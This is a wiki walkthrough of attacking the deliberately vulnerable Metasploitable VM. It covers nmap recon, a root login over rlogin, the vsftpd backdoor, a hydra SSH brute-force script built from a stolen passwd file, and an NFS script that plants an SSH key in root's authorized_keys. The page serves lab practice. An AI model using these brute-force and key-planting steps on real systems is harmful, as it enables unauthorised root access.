From charlesreid1

Revision as of 15:42, 25 March 2016

Metasploitable is a deliberately vulnerable VirtualBox VM for pentesting practice.

Recon

Make a working directory for notes and scan output:

$ mkdir -p box/metasploitable

Start by using nmap to find the host and scan it.

First a fast scan across the subnet (-F covers only the 100 most common ports, so it is quick over a whole /24):

$ nmap -F 10.0.0.*

Then a more extensive SYN scan (-sS uses raw sockets, so run it as root):

$ nmap -sS 10.0.0.*

This reveals the IP address of the Metasploitable VM, which is 10.0.0.27.

We can also do a deeper scan against that one host (service versions, OS detection and the default NSE scripts; again as root):

$ nmap -sS -sV -A 10.0.0.27

This will reveal an array of services, some of which may be exploitable using Metasploit.

Sure enough, the verbose scan returns lots of good information:

$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-03-22T21:31:31-04:00

TRACEROUTE
HOP RTT      ADDRESS
1   16.11 ms 10.0.0.27

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

MySQL

See MSF#MySQL for the MySQL exploits using the Metasploit framework.

PostgreSQL

One of the services running on Metasploitable is PostgreSQL, so let's continue with the SQL theme:

5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

Metasploitable/PostgreSQL

Rlogin

This one is trivial: ports 512, 513 and 514 are open for the "r" services (rexec, rlogin and rsh). rlogin and rsh authenticate by host, not by password: if /etc/hosts.equiv or the target user's ~/.rhosts lists the connecting host (and a "+" entry is a wildcard), the login is granted outright. This box has been misconfigured to trust remote connections from any host.

All you need to do is ask nicely for root!

First, make sure rsh-client is installed; otherwise the rlogin command is just an alias for ssh, which will ask for a password. Run it as root on the attacking machine, because rlogin must bind a privileged source port below 1024:

# apt-get install rsh-client

Now ask nicely for root:

# rlogin -l root 10.0.0.27
Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 

This machine is now totally compromised!
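What makes this work is the host-based trust of the r-services, and that trust is something you can audit from the filesystem once you have a shell. The script below is an added example, not part of the original page: it scans hosts.equiv and .rhosts style files for wildcard entries and reports them. The file contents used to exercise it are constructed; the paths /etc/hosts.equiv and /root/.rhosts are the standard ones rlogind and rshd consult, and the statement that this box trusts any host comes from the page, not from anything the script reads off the VM.

```shell
#!/bin/sh
# Added example, not from the original page: audit the trust files that
# rlogind/rshd consult. Both daemons grant a password-less login when
# /etc/hosts.equiv or the target user's ~/.rhosts lists the connecting
# host (and optionally a user); a "+" in a column is a wildcard, so a line
# "+ +" trusts every user on every host. File contents used to try it out
# are constructed for illustration.

# Print "<file>: <host> <user>" for every entry containing a wildcard.
# Comments (#) and blank lines are skipped; a missing user column means
# "same username as the one logging in" and is shown as "-".
# Exit status 0 if at least one wildcard entry was found, 1 otherwise.
rhosts_wildcards() {
    found=1
    for f in "$@"; do
        [ -r "$f" ] || continue          # unreadable or absent: nothing to trust
        sed -e 's/#.*//' "$f" | awk -v file="$f" '
            NF == 0 { next }
            {
                host = $1
                user = (NF >= 2) ? $2 : "-"
                if (host == "+" || user == "+") {
                    printf "%s: %s %s\n", file, host, user
                    hit = 1
                }
            }
            END { if (hit) exit 0; exit 1 }' && found=0
    done
    return $found
}

# From the attacking box (needs rsh-client; rlogin binds a source port
# below 1024, so run it as root):
#   rlogin -l root 10.0.0.27
# On a host you already control, to see why that worked:
#   sh rhosts_audit.sh /etc/hosts.equiv /root/.rhosts
if [ "$#" -ge 1 ]; then
    if rhosts_wildcards "$@"; then
        echo "wildcard trust present: rlogin/rsh without a password is possible"
    else
        echo "no wildcard entries in the files given"
    fi
fi
```

A host-only line such as "trusted.example.com" is not flagged: it trusts one host for the same username, which is the intended use of these files. Only the "+" forms, which accept any host or any user, are what turn rlogin into a free root login.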

VSFTP

The vsftpd 2.3.4 build running on Metasploitable carries a backdoor that was slipped into the released source tarball in 2011: if the FTP username contains a smiley :) the server opens a root shell listening on port 6200.

Metasploitable/VSFTP

SSH

There are several ways to get into a machine using SSH.

The first is to attempt to log in by brute force, using a tool like hydra. This is the method you would use if you had compromised the MySQL or PostgreSQL servers and could read files on the remote machine, for example /etc/passwd, which gives you the list of all accounts on the system. That list lets you brute-force passwords for some or all users.

Metasploitable/SSH/Brute Force
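A user list taken straight from /etc/passwd is mostly system accounts, and hydra spends a full pass over the password list on every login it is given. The script below is an added example, not the page's or hydra's own code: it filters a recovered passwd file down to accounts that can actually log in interactively and then hands that list to hydra. The passwd lines used to exercise it are constructed, the target 10.0.0.27 is the page's address assumed here, and the wordlist path is whatever you have at hand.

```shell
#!/bin/sh
# Added example, not from the original page: build a worthwhile user list
# from a recovered /etc/passwd and feed it to hydra for an SSH brute force.
# Every login handed to hydra costs a full pass over the wordlist, so
# accounts that cannot log in interactively (shell /bin/false, nologin,
# /bin/sync, ...) are dropped first.

# Read passwd(5) lines on stdin and print login names with an interactive
# shell. Always keeps uid 0; other accounts are kept only if uid >= $1
# (default 1000, the first regular user on Debian/Ubuntu). An empty shell
# field means /bin/sh per passwd(5), so it counts as interactive.
login_users() {
    min_uid="${1:-1000}"
    awk -F: -v min="$min_uid" '
        NF < 7 { next }                       # malformed or truncated line
        {
            shell = ($7 == "") ? "/bin/sh" : $7
            if (shell ~ /(nologin|false|sync|halt|shutdown)$/) next
            uid = $3 + 0
            if (uid != 0 && uid < min + 0) next
            print $1
        }'
}

# Brute force SSH on <target> with the filtered users and a wordlist.
# -e nsr additionally tries an empty password, the login name itself and
# the login name reversed, which catches login==password accounts;
# -t 4 limits parallel connections, since sshd's MaxStartups throttles
# too many concurrent unauthenticated connections.
ssh_bruteforce() {
    target="$1"; passwd_file="$2"; wordlist="$3"
    login_users 1000 < "$passwd_file" > users.txt
    echo "$(wc -l < users.txt) candidate logins written to users.txt"
    hydra -L users.txt -P "$wordlist" -e nsr -t 4 "ssh://$target"
}

# Usage: sh ssh_users.sh 10.0.0.27 ./passwd /path/to/wordlist.txt
# (nothing runs without all three arguments)
if [ "$#" -eq 3 ]; then
    ssh_bruteforce "$@"
fi
```

Keeping uid 0 regardless of the threshold matters here: root is the account the rest of this page ends up with, and on this box it is a normal /bin/bash login.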

Alternatively, if you have write access to the filesystem through an exploit such as the rlogin trick above, a PHP shell dropped through a web app vulnerability, or a netcat payload, you can generate an SSH key pair on the attacker machine and append the public key to the target user's ~/.ssh/authorized_keys on the remote machine. This lets you log in without a password. The method requires filesystem access, so see the other exploits for how to get it.

Take your public key from ~/.ssh/id_rsa.pub and append it to the Metasploitable VM's /root/.ssh/authorized_keys file (create /root/.ssh with mode 700 first if it does not exist; sshd refuses keys from a directory other users can write to).

Then you'll be able to log in like this:

# ssh root@10.0.0.27
Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# 

Network File System

(Also see Linux/File Server page for general notes on NFS in Linux.)

Start by checking out what network services are running. Use the rpcinfo command to do that:

# rpcinfo -p 10.0.0.27

This will return information about open ports and RPC services. We can see that there is an NFS service listening on port 2049:

root@morpheus:~# rpcinfo -p 10.0.0.27
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  38085  status
    100024    1   tcp  52004  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  60702  nlockmgr
    100021    3   udp  60702  nlockmgr
    100021    4   udp  60702  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  34385  nlockmgr
    100021    3   tcp  34385  nlockmgr
    100021    4   tcp  34385  nlockmgr
    100005    1   udp  45599  mountd
    100005    1   tcp  42810  mountd
    100005    2   udp  45599  mountd
    100005    2   tcp  42810  mountd
    100005    3   udp  45599  mountd
    100005    3   tcp  42810  mountd

Now use the showmount command to list the exports and which clients are allowed to mount them:

root@morpheus:~# showmount -e 10.0.0.27
Export list for 10.0.0.27:
/ *

Woot - the entire filesystem is exported to any host (the * is the client list)! showmount does not show the rw/no_root_squash options, but the successful write below confirms both.

To mount an NFSv3 export the client needs its local rpcbind running (the lock manager and statd register with it), so start it first. Alternatively, mount with -o nolock.

# service rpcbind start

Now we can mount the export, with no credentials: NFS here uses AUTH_SYS, so the server simply trusts whatever uid and gid the client reports.

# mkdir /tmp/r00t
# mount -t nfs 10.0.0.27:/ /tmp/r00t

Because root is not squashed on this export, the client's root is root on the server as well. So we can append our public key to root's authorized_keys on the remote machine and obtain passwordless SSH as root (create /tmp/r00t/root/.ssh with mode 700 first if it does not exist):

# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
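Two things the steps above rely on but never check: that root is not squashed on the export (otherwise the write into /root/.ssh is refused, or the file lands owned by nobody), and that the key file ends up with permissions sshd's StrictModes accepts. The script below is an added example, not the page's own commands, and it serves both this section and the key-drop step in the SSH section: it parses showmount output for exports mountable by any host, probes the root-squash behaviour on a mount, and installs a key without duplicating one already present. The server address, mount point /tmp/r00t and key path ~/.ssh/id_rsa.pub are the page's values, assumed here; the showmount text used to exercise the parser is constructed.

```shell
#!/bin/sh
# Added example, not from the original page: check an NFS export before
# relying on it, then drop an SSH key through the mount.
# Assumptions: showmount/mount come from nfs-common (Debian/Ubuntu); the
# client runs as root; server address and paths are taken from the page.

# Read `showmount -e` output on stdin and print each export path whose
# client list allows any host. Linux shows the wildcard as "*", some other
# servers as "(everyone)"; client lists may be comma separated.
nfs_world_exports() {
    awk 'NR > 1 && NF >= 2 {
        n = split($2, clients, ",")
        for (i = 1; i <= n; i++)
            if (clients[i] == "*" || clients[i] == "(everyone)") { print $1; break }
    }'
}

# Mount <server>:<export> and test whether the server squashes root.
# NFS here is AUTH_SYS: the server trusts the uid the client sends, but with
# root_squash it maps uid 0 to nobody, so a file we create arrives owned by
# 65534 (or cannot be created at all inside a root-owned directory).
# Returns 0 when client root is server root (no_root_squash), 1 when root
# is squashed or the export is read-only, 2 when the mount itself failed.
# -o nolock avoids needing a local rpcbind/statd for NFSv3 locking.
nfs_root_squash_check() {
    server="$1"; export_path="$2"; mnt="${3:-/tmp/nfsprobe}"
    mkdir -p "$mnt" || return 2
    mount -t nfs -o nolock "$server:$export_path" "$mnt" || return 2
    probe="$mnt/.squash_probe.$$"
    result=1
    if touch "$probe" 2>/dev/null; then
        owner=$(ls -ln "$probe" | awk '{ print $3 }')
        rm -f "$probe"
        [ "$owner" = "0" ] && result=0
    fi
    umount "$mnt"
    return $result
}

# Append the first line of <pubkey_file> to <fsroot><home>/.ssh/authorized_keys.
# <fsroot> is the mount point of the remote filesystem (or / on the box
# itself). Creates .ssh as 700 and authorized_keys as 600, which is what
# sshd's StrictModes insists on, and skips a key that is already present.
# Over a no_root_squash mount the files are created as uid 0, matching /root.
install_authorized_key() {
    fsroot="$1"; pubkey_file="$2"; home="${3:-/root}"
    sshdir="$fsroot$home/.ssh"; keys="$sshdir/authorized_keys"
    keyline=
    read -r keyline < "$pubkey_file" || [ -n "$keyline" ] || return 2
    mkdir -p "$sshdir" && chmod 700 "$sshdir" || return 2
    [ -f "$keys" ] || { : > "$keys" && chmod 600 "$keys"; } || return 2
    grep -qF -- "$keyline" "$keys" && return 0      # already installed
    printf '%s\n' "$keyline" >> "$keys" && grep -qF -- "$keyline" "$keys"
}

# Usage: sh nfs_key_drop.sh 10.0.0.27 [/ [~/.ssh/id_rsa.pub]]
# (nothing runs without arguments)
if [ "$#" -ge 1 ]; then
    server="$1"; export_path="${2:-/}"; pubkey="${3:-$HOME/.ssh/id_rsa.pub}"
    echo "exports mountable by any host:"
    showmount -e "$server" | nfs_world_exports
    if nfs_root_squash_check "$server" "$export_path" /tmp/r00t; then
        mount -t nfs -o nolock "$server:$export_path" /tmp/r00t \
            && install_authorized_key /tmp/r00t "$pubkey" /root \
            && umount /tmp/r00t \
            && echo "key installed; try: ssh root@$server"
    else
        echo "root is squashed or the export is read-only; the write to /root would not work"
    fi
fi
```

If the probe reports root squashed, the mount is still useful (anything world-writable on the server, such as /tmp, can be read and written as nobody), but the authorized_keys trick needs a different path in: a user's home directory that is world-writable, or one of the other exploits on this page.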

Related